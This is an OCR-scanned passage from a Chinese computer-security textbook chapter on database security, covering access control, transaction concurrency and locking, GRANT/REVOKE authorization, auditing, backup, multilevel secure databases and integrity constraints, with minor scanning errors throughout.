使 用 事务 和 锁 的 机 制 保证 多 用 户 的 并 发 控制 ,使 用 授权 与 撤销 机 制 保证 安全 访问 。 
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9.3.1 数据 库 的 访问 控制 


访问 控制 是 数据 库 安 全 至 关 重 要 的 内 容 , 可 以 理解 为 安全 基本 服务 或 安全 基本 机 制 。 
作为 安全 基本 服务 ,访问 控制 根据 规定 的 安全 策略 和 安全 模式 对 合法 用 户 进行 访问 授权 ,并 
防止 未 经 授权 用 户 以 及 合法 授权 用 户 的 非法 访问 ,涉及 的 对 象 通常 包括 访问 主体 、 资 源 客 
体 、 访 问 策略 和 策略 强制 执行 等 组 件 。 作 为 安全 基本 机 制 ,访问 控制 实施 对 资源 或 操作 的 限 
制 , 并 进行 授权 ,可 以 直接 支持 机 密 性 、 完 整 性 .可 用 性 , 常 使 用 的 技术 包括 访问 控制 矩阵 、 访 
问 控制 列表 访问 标签 .权限 ,鉴别 赁 证、 安全 标记 、 访 问 时 间 和 访问 路 由 。 

当前 ,数据库 系统 主要 使 用 自主 访问 控制 (DAC) 策 略 .强制 访问 控制 (MAC) 策 略 和 基 
于 角色 的 访问 控制 (RBAC)。 

在 数据 库 中 ,访问 控制 机 制 可 以 分 为 两 大 类 型 : 基于 能 力 (Capabilities) 的 访问 控制 和 
基于 访问 控制 列表 的 访问 控制 。 

自主 访问 控制 是 目前 数据 库 中 使 用 最 为 普遍 的 访问 控制 手段 。 用 户 可 以 按照 自己 的 意 
愿 对 系统 的 参数 做 适当 修改 以 决定 哪些 用 户 可 以 访问 他 们 的 资源 , 即 一 个 用 户 可 以 有 选择 
地 与 其 他 用 户 共享 他 的 资源 。 用 户 对 信息 的 控制 基于 对 用 户 的 鉴别 和 访问 规则 的 确定 。 在 
数据 库 管理 系统 中 ,系统 需要 指定 每 个 用 户 对 系统 中 每 个 访问 对 象 的 访问 权限 。 例 如 ,允许 
一 个 用 户 读 取 某 个 数据 ,或 是 允许 一 个 用 户 写 入 一 个 数据 。 通 常用 户 最 核心 的 访问 权限 是 
对 资源 对 象 的 “拥有 ” 权 。 当 某 个 用 户 要 求 访问 某 个 数据 库 的 资源 时 ,系统 将 检查 该 用 户 对 
该 资源 的 所 有 权 或 者 衍生 出 来 的 访问 权限 。 如 果 通 过 , 则 允许 该 用 户 访问 。 

无 论 如 何 选 择 数 据 库 及 其 应 用 系统 的 安全 策略 模型 ,数据 库 系 统 的 SQL 语言 都 可 以 成 
为 确保 安全 策略 有 效 执行 的 工具 ,这 是 数据 库 及 其 应 用 系统 安全 策略 执行 机 制 与 其 他 系统 
安全 策略 执行 机 制 的 一 个 重要 区 别 。 

通常 ,基于 SQL 的 安全 策略 执行 机 制 需要 具备 以 下 功能 模块 : 查询 修改 算法 、 规 则 处 
理 和 访问 控制 策略 强制 执行 .策略 有 效 性 证 明 或 者 验证 、 策 略 一 致 性 和 完备 性 检查 。 

数据 库 通 常 按 照 用 户 的 访问 权限 进行 逻辑 分 割 。 限 制 访问 是 数据 库 集中 管理 形式 的 职 
责 和 优势 。DBMS 需要 实施 这 样 的 访问 策略 : 授权 访问 所 有 指定 的 数据 ,阻止 访问 禁止 的 
数据 。 数 据 库 管理 员 需 要 分 别 以 视图 .关系 、 域 .记录 ,甚至 元 素 级 给 予 说 明 。 用 户 或 程序 可 
能 拥有 的 权限 包括 读 改变 、 删 除 或 附加 一 个 值 . 增 加 或 删除 整个 域 或 记录 ,重组 数据 库 。 

因为 数据 库 中 的 每 个 文件 可 能 还 包含 几 百 个 数据 域 ,访问 控制 的 实现 要 比 操作 系统 困 
难得 多 ,粒度 的 大 小 影响 了 处 理 的 效率 。 


9.3.2 事务 并 发 控制 


为 了 充分 利用 数据 库 的 共享 数据 资源 ,应 允许 多 个 用 户 并 行 操作 的 数据 库 ,数据库 对 这 
种 并 行 操作 进行 的 控制 即 并 发 控制 。 数 据 库 的 并 发 控制 机 制 可 以 保持 数据 库 在 多 用 户 并 发 
操作 时 的 数据 一 致 性 和 正确 性 。 

1. 事务 (Transaction) 

事务 是 数据 库 系统 中 的 一 个 执行 工作 单位 , 它 是 由 用 户 定义 的 一 组 操作 序列 组 成 。 事 
务 要 么 全 执行 要 么 全 不 执行 。 事务 是 恢复 和 并 发 控制 的 基本 单位 。 

一 个 事务 可 以 是 一 组 SQL 语句 ,一 个 应 用 程序 可 以 包括 多 个 事务 。 为 了 保护 数据 的 完 
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整 性 ,要 求 事务 具有 原子 性 (Atomic). 一 致 性 (Consistency)、 隔 离 性 (Isolation) 和 持久 性 
(Durability)4 个 性 质 , 称 为 事务 的 ACID 准则 。 

在 COMMIT 之 前 , 即 在 数据 库 修 改过 程 中 ,数据 可 能 是 不 一 致 的 ,事务 本 身 也 可 能 被 
撤销 。 只 有 在 COMMIT 之 后 ,事务 对 数据 库 所 产生 的 变化 才 对 其 他 事务 开放 ,这 就 可 以 避 
免 其 他 事务 访问 不 一 致 或 不 存在 的 数据 。 

2. 并 发 控制 

当 同 一 数据 库 系统 中 有 多 个 事务 并 发 运行 时 ,可 能 导致 的 数据 库 不 一 致 性 主要 有 以 下 
三 种 : 丢失 更 新 、 污 读 和 不 可 重读 。 产 生 这 三 类 数据 不 一 致 性 的 主要 原因 就 是 并 发 操作 破 
坏 了 事务 的 隔离 性 。 

事务 准备 接受 不 一 致 数据 的 级 别称 为 隔离 级 别 。 隔 离 级 别 是 一 个 事务 必须 与 其 他 事务 
进行 隔离 的 程度 。 较 低 的 隔离 级 别 可 以 增加 并 发 , 较 高 的 隔离 级 别 可 以 确保 数据 的 正确 性 。 
SQL-92 定义 了 下 列 4 种 隔离 级 别 , 由 低 到 高 分 别 为 读 未 提交 (Read Uncommitted) 、 读 提交 
(Read Committed) ,可 重复 读 (Repeatable Read) 和 可 串 行 化 (Serializable) 。 

并 发 控制 就 是 要 求 DBMS 提供 并 发 控制 功能 以 正确 的 方式 高 度 并 发 事务 ,避免 并 发 事 
务 之 间 的 相互 干扰 造成 数据 的 不 一 致 性 ,保证 数据 库 的 完整 性 。 

封锁 是 DBMS 普遍 采用 实现 并 发 控制 的 主要 技术 。 所 谓 封 锁 就 是 当 一 个 事务 在 对 某 
个 数据 对 象 (可 以 是 数据 项 .记录 ,数据 集 , 以 至 整个 数据 库 ) 进 行 操作 之 前 ,必须 获得 相应 的 
锁 ,以 保证 数据 操作 的 正确 性 和 一 致 性 。 实 际 上 , 锁 是 一 个 控制 块 ,其 中 包括 被 加 锁 记 录 的 
标识 符 及 持 有 锁 的 事务 的 标识 符 等 。 

基本 的 封锁 类 型 有 两 种 : 排 它 锁 (X 锁 ) 和 共享 锁 (S 锁 ) 。 封 锁 对 象 的 大 小 称 为 封锁 粒 
度 。 封 锁 的 对 象 可 以 是 字段 .数据 库 等 逻辑 单元 ,也 可 以 页 (数据 页 或 索引 页 )、 块 等 物理 
单元 。 

封锁 粒度 与 系统 的 并 发 度 和 并 发 控制 的 开销 密切 相关 。 封 锁 粒 度 越 小 ,系统 中 能 够 被 
封锁 的 对 象 就 越 多 ,并 发 度 越 高 ,但 封锁 机 构 复 杂 , 系 统 开销 也 就 越 大 。 封 锁 粒 度 越 大 ,能 被 
封锁 的 对 象 就 越 少 ,并 发 度 越 小 ,封锁 机 构 简 单 ,系统 开销 也 就 越 小 。 

封锁 协议 是 封锁 时 的 规则 ,要求 数据 对 象 R 在 修改 时 只 能 是 一 个 事务 先 对 其 加 XX 锁 ， 
在 读 取 时 可 以 是 多 个 事务 对 其 加 S 锁 ,并 加 锁 直 到 事务 T 结束 才 释 放 。 封 锁 协议 解决 了 并 
发 操作 所 带 来 的 三 个 不 一 致 性 问题 。 

封锁 技术 可 能 产生 活 锁 和 死 锁 问题 ,DBMS 预防 死 锁 要 付出 很 高 的 代价 。 如 果 已 经 发 
现 死 锁 ,DBA 从 依赖 相同 资源 的 事务 中 抽出 某 个 事务 作为 牺牲 品 , 将 它 撤销 并 释放 此 事务 
占用 的 所 有 数据 资源 ,以 消除 死 锁 。 

3. 事务 调度 

多 个 事务 的 操作 的 一 个 执行 顺序 称 为 调度 ,也 就 是 说 ,n 个 事务 T1,T2,…, Tn 的 调度 s 
是 这 个 事务 的 操作 的 一 个 执行 顺序 。 这 n 个 事务 的 调度 需要 服从 下 述 约束 : s 中 事务 Ti 
操作 的 执行 顺序 必须 与 单个 Ti 执行 时 操作 的 执行 顺序 相同 ,调度 ; 中 其 他 事务 Tj 的 操作 
可 以 与 Ti 的 操作 交错 执行 。 

多 个 事务 执行 的 调度 分 为 串 行 执行 和 并 发 执行 。 以 事务 为 单位 ,多 个 事务 依次 顺序 执 
行 称 为 串 行 执行 。 多 个 事务 以 事务 的 操作 为 单位 , 按 一 定 调度 策略 同时 执行 称 为 并 发 执行 。 

当 且 仅 当 几 个 事务 并 发 运行 的 结果 和 这 些 事务 按 某 一 次 序 串 行 运行 的 结果 相同 时 ,这 


362 


数据 库 安 全 


种 并 发 操作 才 是 正确 的 。 这 种 调度 称 为 可 串 行 化 的 调度 。 

当 某 个 调度 中 访问 同一 个 数据 项 的 两 个 操作 是 属于 不 同事 务 且 有 一 个 是 写 操作 , 则 这 
两 个 操作 是 冲突 的 。 

在 处 理事 务 操作 时 ,事务 管理 器 同时 接收 来 自 多 个 事务 的 并 发 操作 请 求 ,调度 器 的 作用 
就 是 执行 来 自 事务 处 理 器 的 操作 序列 。 对 于 每 个 事务 的 申请 操作 ,调度 器 可 能 有 下 列 几 种 
响应 方式 : 

(1) 立即 允许 该 操作 ,并 将 操作 转交 数据 管理 器 执行 。 

(2) 拒绝 该 操作 ,并 通知 事务 管理 器 中 止 该 事务 。 

(3) 延迟 该 操作 ,等待 到 可 以 作出 判断 时 再 执行 或 中 止 。 

由 于 各 个 事务 之 间 的 操作 相互 独立 ,因此 事务 管理 器 传递 给 调度 器 的 事务 集合 并 不 一 
定 是 可 串 行 化 的 。 但 是 经 过 调度 器 的 判断 与 处 理 ,其 输出 给 数据 管理 器 的 操作 序列 却 是 可 
串 行 化 的 操作 序列 。 

4. 调度 机 制 

传统 数据 库 管理 系统 根据 数据 元 素 保存 的 份 数 可 以 分 为 单 版 本 与 多 版 本 两 大 类 ,其 调 
度 机 制 可 以 分 为 两 阶段 锁 机 制 与 非 封锁 机 制 两 大 类 。 其 中 的 非 封锁 调度 机 制 又 包括 基于 时 
戳 的 调度 机 制 .顺序 图 机 制 和 有 效 性 验证 机 制 等 几 种 。 

(1) 两 段 锁 协 议 。 两 段 锁 协议 是 指 所 有 事务 必须 分 两 个 阶段 对 数据 项 加 锁 和 解锁 。 第 
一 阶段 是 获得 封锁 ,事务 可 以 申请 获得 任何 数据 项 上 任何 类 型 的 锁 , 但 是 不 能 释放 任何 锁 。 
第 二 阶段 是 释放 封锁 ,事务 可 以 释放 任何 数据 项 上 任何 类 型 的 锁 , 但 是 不 能 再 申请 任何 锁 。 

并 发 执行 的 所 有 事务 均 遵 守 两 段 锁 协 议 是 可 串 行 化 调度 的 充分 条 件 。 两 段 锁 协 议 并 不 
要 求 事务 必须 一 次 将 所 有 要 使 用 的 数据 全 部 加 锁 ,因此 遵守 两 段 锁 协 议 的 事务 可 能 发 生 
死 锁 。 

(2) 两 版 本 两 阶段 封锁 。 在 两 版 本 两 阶段 封锁 (Two Version Two-Phase Locking， 
2V2PL) 中 ,每 个 元 素 最 多 存在 两 个 版 本 : 一 个 已 提交 版 本 ,一 个 未 提交 版 本 。 因 为 读 操作 
使 用 已 提交 版 本 ,而 每 个 事务 的 写 操作 要 创建 一 个 新 版 本 ,同一 个 元 素 上 的 读 锁 与 写 锁 操作 
之 间 并 不 冲突 。 写 锁 可 以 阻止 其 他 事务 的 写 操作 。 任 何 时 刻 最 多 只 有 一 个 未 提交 版 本 。 

两 版 本 两 阶段 封锁 机 制 中 使 用 三 种 锁 : 读 锁 、 写 锁 与 验证 锁 。 验 证 锁 与 其 他 两 种 锁 都 
冲突 。 事 务 在 读 写 操作 时 正常 地 使 用 读 、 写 锁 。 但 当 事 务 要 提交 时 ,调度 器 将 其 所 持 有 的 全 
部 写 锁 转变 成 验证 锁 。 

(3) 多 版 本 时 戳 。 在 多 版 本 时 戳 机 制 中 ,每 个 元 素 可 能 同时 存在 多 个 版 本 。 调 度 器 将 
每 一 个 操作 请 求 按 一 定 规则 转化 成 对 某 个 具体 版 本 元 素 的 操作 。 某 些 为 了 确保 可 串 行 化 而 
无 法 转化 的 操作 请 求 将 被 拒绝 。 每 个 事务 读 某 个 数据 元 素 时 ,在 该 数据 元 素 一 系列 版 本 中 
选择 小 于 该 事务 的 顺序 时 戳 中 写 时 戳 最 大 的 版 本 。 每 个 事务 在 写 数据 元 素 时 , 则 创建 自己 
的 新 版 本 。 


9.3.3 关系 数据 库 的 授权 机 制 


授权 机 制 是 关系 数据 库 实 现 安全 与 保护 的 重要 途径 ,也 是 数据 库 安 全 最 早 研究 解决 的 
问题 之 一 。 授 权 机 制 的 总 体 目标 是 提供 保护 与 安全 控制 ,允许 授权 用 户 合法 地 访问 信息 。 
数据 库 系 统 中 ,不 同 的 用 户 对 象 有 不 同 的 操作 权力 。 对 于 存 取 权限 的 定义 称 为 授权 。 
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这 些 定义 经 过 编译 后 存储 在 数据 字典 中 。 对 数据 库 的 操作 权限 一 般 包 括 查 询 权 、 记 录 的 修 
改 权 、 索 引 的 建立 权 和 数据 库 的 创建 权 。 把 这 些 权力 按 一 定 的 规则 授予 用 户 , 每 当 用 户 发 出 
数据 库 的 操作 请 求 后 ,DBMS 查找 数据 字典 ,根据 用 户 权限 进行 合法 权 检 查 ,以 保证 用 户 的 
操作 在 自己 的 权限 范围 之 内 。 

授权 机 制 贯穿 于 关系 及 视图 动态 创建 动态 撤销 整个 过 程 , 包 括 授予 (Grant)、 检 查 
(Checking) ,撤销 (Revoke) 等 动态 环节 。 通 常 ,授权 可 以 通过 访问 控制 列表 方式 实现 ,这 种 
方式 支持 撤销 。 

假定 授权 目标 为 Table,SYSTEM R 授权 的 语法 格式 可 以 表示 为 : 


GRANT [ALL RIGHTS|<privileges> | ALL BUT <privileges> ] ON <table> TO <user- list> [WITH 
GRANT OPTION] 。 


REVOKE 的 语法 格式 基本 类 似 , 可 以 表示 为 : 
REVOKE [ALL RIGHTS|<privileges> |ON <table> FROM <user- list> 。 
例如 用 户 A 执行 授权 撤销 序列 后 的 权限 : 


A: GRANT READ, INSERT, UPDATE ON EMP TO C 
B: GRANT READ, UPDATE ON EMPTO C 
A: REVOKE INSERT,UPDATE ON EMP FROM C 


9.3.4 审计 与 日 志 


数据 库 审计 是 指 对 审计 和 事务 日 志 进 行 审查 ,从 而 跟踪 数据 和 数据 库 结 构 的 变化 。 数 
据 库 可 以 设置 捕捉 数据 和 元 数据 的 改变 以 及 存储 这 些 资料 的 数据 库 所 做 的 修改 。 

数据 库 审 计 作为 数据 库 管 理 系统 安全 性 重要 的 一 部 分 ,能 够 记录 与 数据 库 安 全 性 相关 
的 所 有 数据 库 操作 ,如 数据 库 操作 \ 改 变 的 数据 值 .执行 该 项 操作 的 人 ,以 及 其 他 属性 。 审 计 
确保 生成 的 记录 文件 的 准确 性 和 完整 性 。 此 外 ,审计 跟踪 还 能 把 一 系列 的 语句 转化 为 合理 
的 事务 ,并 提供 业务 流程 取证 分 析 所 需 的 业务 环境 。 

DBMS 一 般 使 用 日 志 实 现 审 计 功 能 ,有 两 种 方式 的 审计 , 即 用 户 审 计 和 系统 审计 。 配 
置 日 志 功 能 ,对 用 户 登录 进行 记录 ,记录 内 容 包括 用 户 登 录 使 用 的 账号 .登录 是 否 成 功 . 登 录 
时 间 以 及 远程 登录 时 用 户 使 用 的 IP 地 址 。 触 发 器 与 AUDIT 会 有 相应 资源 开销 。 

日 志 记 录 可 以 协助 维护 数据 库 的 完整 性 ,为 分 析 故 障 发 生 和 解决 问题 提供 依据 。 另 一 
个 优点 是 可 以 掌握 用 户 不 断 增 加 对 被 保护 数据 的 访问 。 单 一 的 访问 不 会 暴露 被 保护 的 数 
据 , 但 在 一 系列 连续 的 访问 后 ,将 数据 综合 起 来 就 可 能 发 现 被 保护 的 数据 。 在 这 种 情况 下 ， 
审计 追踪 可 以 确定 用 户 已 经 获得 的 数据 线索 ,然后 指导 做 出 是 否 还 应 该 允许 用 户 做 进一步 
查询 的 决定 。 

Oracle 通过 设置 参数 audit_trail= db 或 os 来 打开 数据 库 审 计 , 然 后 可 使 用 Audit 命令 
对 相应 的 对 象 进行 审计 设置 。 


9.3.5 备份 与 恢复 
整个 数据 库 的 完整 性 由 DBA 负责 。 保 护 整个 数据 库 的 方法 之 一 是 定期 备份 数据 库 系 
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统 中 的 所 有 文件 。 数 据 库 的 备份 大 致 有 三 种 类 型 : 

(1) 冷 备 份 。 冷 备份 是 在 没有 最 终 用 户 访问 它 的 情况 下 关闭 数据 库 , 并 将 其 备份 ,这 是 
保持 数据 完整 性 的 最 好 办 法 。 由 OS 负责 管理 数据 库 文件 备份 ,使 用 标准 访问 控制 工具 保 
入 实体 

(2) 热 备份 。 热 备份 是 在 数据 库 正在 被 写 入 的 数据 更 新 时 进行 ,日 志文 件 将 需要 做 更 
新 或 更 改 的 业务 指令 “ 堆 起 来 ”, 而 不 是 真正 将 任何 数据 值 写 入 数据 库 。 

(3) 逻辑 备份 。 逻 辑 备份 使 用 软件 技术 从 数据 库 周 期 性 提取 数据 并 将 结果 写 人 一 个 输 
出 文件 5 

数据 库 的 恢复 技术 有 单纯 以 备份 为 基础 的 恢复 和 以 备份 .日 志 为 基础 的 恢复 两 种 。 数 
据 库 能 够 在 故障 点 重建 非常 重要 。DBMS 需要 维护 一 个 事务 日 志 , 在 系统 发 生 故 障 后 ,可 
通过 重新 装 人 数据 库 的 后 备 副本 并 重新 执行 “日 志 ” 记 录 所 有 的 事务 ,从 而 获得 用 户 的 正确 

由 数据 库 管理 系统 提供 一 套 方法 ,可 及 时 发 现 故 障 和 修复 故障 ,从 而 防止 数据 被 破坏 。 
数据 库 系 统 能 尽快 恢复 数据 库 系 统 运行 时 出 现 的 故障 ,可 能 是 物理 上 或 是 逻辑 上 的 错误 , 比 
如 对 系统 的 误 操 作 造成 的 数据 错误 等 。 


9.3.6 多 级 安全 数据 库 


在 关系 型 数据 库 中 应 用 MAC 策略 需要 扩展 关系 模型 自身 的 定义 。 人 们 因此 提出 了 多 
级 关系 模型 。 

多 级 关系 数据 库 模 型 (Maltilevel Relational Model) 是 传统 关系 数据 模型 的 自然 扩展 ， 
通过 元 素 级 安全 等 级 标签 表示 多 级 关系 。 同 时 ,多 级 关系 数据 模型 也 重新 定义 了 许多 已 有 

念 ,例如 多 实例 .引用 完整 性 .数据 操作 ,并 引入 了 一 些 新 的 概念 。 

多 级 关系 的 本 质 特 性 是 不 同 的 元 组 具有 不 同 的 访问 等 级 (Access Class)。 关 系 被 分 割 
成 不 同 的 安全 区 ,每 个 安全 区 对 应 一 个 访问 等 级 。 一 个 访问 等 级 为 的 主体 能 读 取 所 有 访 
问 等 级 小 于 或 等 于 c 的 安全 区 中 的 所 有 元 组 ,这 样 的 元 组 集合 构成 访问 等 级 为 c 的 多 级 关 
系 的 视图 (View) 。 

在 关系 数据 库 管 理 系统 中 , 表 、 行 、 列 .元 素 都 可 以 由 主体 对 其 进行 操作 ,都 可 能 作为 安 
全 客体 而 进行 标记 。 通 常 ,每 个 元 组 中 的 属性 有 一 个 属性 标签 (Attribute Label) ,用 于 标记 
元 组 中 属性 的 访问 等 级 ;同时 还 有 一 个 元 组 标签 (Tuple Label) ,是 与 元 组 中 的 属性 相关 的 
访问 等 级 中 的 最 小 元 素 。 

引入 安全 等 级 后 ,会 导致 多 实例 问题 ,主要 表现 在 以 下 三 个 方面 : 

(1) 多 实例 关系 。 指 具有 相同 关系 名 和 模式 ,但 安全 等 级 不 同 的 多 个 关系 。 

(2) 多 实例 元 组 。 指 具有 相同 主 码 , 但 其 主 码 的 安全 等 级 不 同 的 多 个 元 组 。 

(3) 多 实例 元 素 。 指 一 个 属性 具有 不 同 的 安全 等 级 ,但 却 与 相同 主 码 和 码 的 安全 等 级 
相 联系 的 多 个 元 素 。 

多 实例 允许 两 个 或 者 两 个 以 上 的 元 组 具有 相同 的 主 码 。 主 要 用 于 解决 推理 分 析 和 隐蔽 
通道 分 析 问 题 , 避 免 低 等 级 用 户 推 出 高 等 级 用 户 拥 有 的 数据 是 否 具有 某 些 特性 ,如 表 9. 3 所 
示 为 多 实例 记录 。 


365| 


《计算 机 系统 安全 》 


表 9.3 多 实例 记录 举例 


姓名 敏感 度 任务 地 点 
Hill. Bob Program Mgr London 
Hill. Bob TS Secret Agent South Bend 


分 离 分 区 是 一 个 大 的 数据 库 被 分 成 几 个 分 离开 的 数据 库 , 每 个 都 有 自己 的 敏感 级 别 。 
这 种 方法 失去 了 数据 库 的 基本 优点 : 消除 元 余数 据 以 及 提高 数据 的 正确 性 。 

完整 性 锁 的 目的 是 能 够 让 用 户 使 用 任何 数据 库 管理 器 ,实施 或 授权 对 敏感 数据 的 访问 。 
完整 性 锁 的 数据 项 由 三 个 部 分 组 成 : 实际 的 数据 本 身 、 敏 感性 标签 和 校 验 和 。 缺 点 是 系统 
必须 扩大 数据 存储 空间 ,对 敏感 性 标签 解码 增加 了 处 理 数据 时 间 ,不 可 信 的 数据 库 管 理 器 可 
能 泄露 数据 。 

视图 在 过 滤 原 始 数据 库 的 内 容 之 后 ,把 用 户 应 获得 的 数据 呈现 给 用 户 。 除 非 用 户 有 权 
访问 至 少 一 个 元 素 , 和 否则 所 有 属性 ( 列 ) 或 行 都 不 能 提供 给 用 户 。 保 留用 户 无 权 访问 的 所 有 
元 素 ,元 素 值 用 UNDEFINED 替代 。 用 户 只 能 在 视图 定义 的 数据 库 子 集 上 操作 ,而 且 只 能 
执行 视图 中 授权 的 操作 。 

多 级 安全 数据 库 体系 结构 是 多 级 安全 数据 库 管理 系统 的 基础 。 这 些 体系 结构 主要 分 为 
三 类 : TCB 子 集结 构 .可 信和 主体 结构 和 外 部 封装 TCB 结构 。 

出 于 安全 和 效率 的 综合 考虑 ,目前 多 数 商 业 多 级 安全 关系 模型 数据 库 只 解决 多 实例 元 
组 问题 。 多 级 安全 数据 库 主要 用 于 研究 并 且 只 具有 历史 意义 。 


9.4 数据 库 的 数据 安全 


数据 库 的 完整 性 是 指 保护 数据 库 中 数据 的 正确 性 有 效 性 和 一 致 性 ,防止 数据 库 中 存在 
不 符合 语义 的 数据 和 错误 信息 的 输入 和 输出 ,造成 无 效 操作 。 正 确 性 是 指数 据 的 输入 值 与 
数据 表 对 应 域 的 类 型 一 样 ; 有 效 性 是 指数 据 库 中 的 理论 数值 满足 现实 应 用 中 对 该 数值 段 的 
约束 ;一 致 性 是 指 不 同 用 户 使 用 的 同一 数据 应 该 是 一 样 的 。 

数据 库 的 完整 性 关系 到 数据 能 否 真实 地 反映 现实 世界 ,往往 通过 数据 模型 如 关系 数据 
模型 实现 ,定义 相关 数据 元 素 的 约束 ,包括 域 值 约束 、 结 构 约束 .引用 约束 .断言 和 触发 器 等 。 
在 数据 库 领域 中 ,有 4 种 最 常用 的 数据 模型 : 关系 模型 .层次 模型 .网 状 模型 和 面向 对 象 
模型 。 

数据 库 的 安全 性 是 保护 数据 库 防止 非法 使 用 所 造成 数据 的 泄露 更 改 或 破坏 ,包括 数据 
库 对 象 文件 的 安全 数据库 内 部 数据 的 安全 。 往 往 采 用 对 数据 隔离 、 加 密 存储 和 授权 访问 
(如 账户 ,口令 和 权限 控制 等 ) 等 措施 。 

安全 性 措施 的 防范 对 象 是 非法 用 户 和 非法 操作 ,完整 性 措施 的 防范 对 象 是 合法 用 户 的 
不 合 语义 的 数据 。 


9.4.1 完整 性 约束 


1. 值 的 约束 和 结构 的 约束 
从 约束 条 件 使 用 的 对 象 来 分 ,可 把 约束 分 为 值 的 约束 和 结构 的 约束 。 
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值 的 约束 即 对 数据 类 型 ,数据 格式 和 取 值 范围 等 进行 规定 。 

(1) 对 数据 类 型 的 约束 ,包括 数据 的 类 型 长度、 单位 和 精度 等 。 例 如 ,规定 学 生性 别 的 
数据 类 型 应 为 字符 型 ,长 度 为 2。 

(2) 对 数据 格式 的 约束 。 例 如 ,规定 日 期 的 数据 格式 为 YYYY. MM. DD。 

(3) 对 取 值 范围 的 约束 。 例 如 ,月 份 的 取 值 范围 为 1~12, 日 期 为 1~31。 

(4) 对 空 值 的 约束 。 空 值 表示 未 定义 或 未 知 的 值 , 它 与 零 值 和 空格 不 同 。 例 如 ,学 号 和 
课程 号 不 可 以 为 空 值 ,但 成 绩 可 以 为 空 值 。 

结构 约束 是 对 数据 之 间 联 系 的 约束 。 数 据 库 中 同一 关系 的 不 同属 性 之 间 应 满足 一 定 的 
约束 条 件 , 同 时 不 同 关系 的 属性 之 间 也 有 联系 ,也 应 满足 一 定 的 约束 条 件 。 常 见 的 结构 约束 
有 如 下 4 种: 

(1) 函数 依赖 约束 。 说 明了 同一 关系 中 不 同属 性 之 间 应 满足 的 约束 条 件 。 例 如 2NF、 
3NF 和 BCNF 这 些 不 同 的 范式 应 满足 不 同 的 约束 条 件 。 大 部 分 函数 依赖 约束 都 隐 含 在 关 
系 模式 结构 中 ,由 模式 来 保持 函数 依赖 。 

(2) 实体 完整 性 约束 。 说 明了 关系 主键 (或 主 码 ) 的 属性 列 必须 唯一 ,其 值 不 能 为 全 空 
或 部 分 为 空 。 

(3) 参照 完整 性 约束 。 说 明了 不 同 关系 的 属性 之 间 的 约束 条 件 , 即 外 部 键 (外 码 ) 的 值 
应 能 够 在 被 参照 关系 的 主键 值 中 找到 或 取 空 值 。 

(4) 用 户 自 定义 完整 性 。 从 实际 应 用 系统 出 发 , 按 需 定义 属性 之 间 要 满足 的 约束 条 件 。 

(5) 统计 约束 。 规 定 某 个 属性 值 与 关系 多 个 元 组 的 统计 值 之 间 必 须 满足 某 种 约束 条 
件 , 实 现 起 来 开销 很 大 。 

其 中 ,实体 完整 性 约束 和 参照 完整 性 约束 是 关系 模型 的 两 个 极其 重要 的 约束 ,被 称 为 关 
系 的 两 个 不 变性 。 

2. 静态 约束 和 动态 约束 

完整 性 约束 从 约束 对 象 的 状态 可 分 为 静态 约束 和 动态 约束 。 

静态 约束 是 指数 据 库 在 每 一 个 确定 状态 时 数据 对 象 应 满足 的 约束 条 件 ,反映 了 数据 库 
状态 的 合理 性 。 值 的 约束 和 结构 的 约束 均 属 于 静态 约束 。 

动态 约束 是 指数 据 库 从 一 种 状态 转变 为 男 一 种 状态 时 (数据 库 数据 变动 前 后 ) ,新 \ 旧 值 
之 间 所 应 满足 的 约束 条 件 , 它 是 反映 数据 库 状态 变迁 的 约束 。 

3. 完整 性 规则 

完整 性 规则 主要 由 以 下 三 部 分 构成 ; 

(1) 触发 条 件 。 规 定 系统 什么 时 候 使 用 规则 检查 数据 。 

(2) 约束 条 件 。 规 定 系统 检查 用 户 的 操作 请 求 违背 的 完整 性 约束 条 件 。 

(3) 违约 响应 。 规 定 系统 如 果 发 现 操 作 违背 了 完整 性 约束 条 件 , 应 该 采取 一 定 的 动作 
来 保证 数据 的 完整 性 。 

完整 性 规则 从 执行 时 间 上 可 分 为 立即 执行 约束 和 延迟 执行 约束 。 立 即 执行 约束 是 指 对 
用 户 事务 的 一 条 语句 执行 后 立即 进行 数据 完整 性 约束 条 件 检查 ;延迟 执行 约束 是 指 在 整个 
事务 执行 结束 后 ,再 对 约束 条 件 进 行 完整 性 检查 ,结果 正确 后 才能 提交 。 

4. 完整 性 实现 

数据 完整 性 一 般 可 分 为 实体 完整 性 \ 域 完整 性 .引用 完整 性 和 用 户 定义 完整 性 4 种 类 


367| 


《计算 机 系统 安全 》 


型 。 另 外 ,触发 器 ,存储 过 程 等 也 能 以 一 定 方式 控制 数据 完整 性 。 

(1) 实体 完整 性 。 实 体 完整 性 将 行 定义 为 特定 表 的 唯一 实体 。 实 体 完整 性 相关 的 约束 
有 主键 PRIMARY KEY 约束 ,唯一 值 UNIQUE 约束 和 标识 值 IDENTITY 属性 (一 般 作为 
主键 ) 等 。 

(2) 域 完整 性 。 指 给 定 列 的 输入 正确 性 与 有 效 性 。 如 限制 类 型 .格式 和 值 域 等 。 

(3) 引用 完整 性 ( 即 参照 完整 性 )。 主 要 由 FOREIGN KEY 约束 体现 , 它 标识 表 之 间 的 
关系 ,一 个 表 的 外 键 指向 另 一 个 表 的 候选 键 或 唯一 键 。 

(4) 用 户 定义 完整 性 。 主 要 由 Check 约束 所 定义 的 列 级 或 表 级 约束 体现 ,用 户 定义 完 
整 性 还 能 由 规则 、 触 发 器 .客户 端 或 服务 器 端 应 用 程序 灵活 定义 。 

(5) 断言 。 也 称 为 通用 约束 ,可 以 定义 属性 、 元 组 .关系 甚至 库 模 式 的 约束 。 

(6) 触发 器 。 是 一 类 特殊 的 存储 过 程 , 被 定义 为 在 对 表 或 视图 发 出 UPDATE .INSERT 
或 DELETE 语句 时 自动 执行 。 一 个 表 可 以 有 多 个 触发 器 。 

5. 监视 器 

监视 器 (Monitor) 是 DBMS 中 负责 数据 库 结 构 完整 性 的 单元 。 

范围 比较 监视 器 检测 每 个 新 产生 的 值 , 确 保 每 个 值 在 可 接受 的 范围 内 。 范 围 比 较 可 用 
于 保障 数据 库 的 内 在 一 致 性 。 如 果 怀 疑 数据 库 中 的 某 些 数据 已 经 遭 到 破坏 ,范围 检查 可 以 
识别 所 有 可 疑 记 录 的 数据 。 

大 多 数 数据 库 管 理 系统 都 要 执行 简单 的 范围 检查 。 然 而 , 较 复杂 的 状态 和 转换 约束 需 
要 专门 的 程序 进行 测试 。 


9.4.2 数据 库 的 数据 加 密 


数据 库 加 密 可 以 在 OS 层 .DBMS 内 核 层 和 DBMS 外 层 等 不 同 层 次 实现 。 加 密 算法 需 
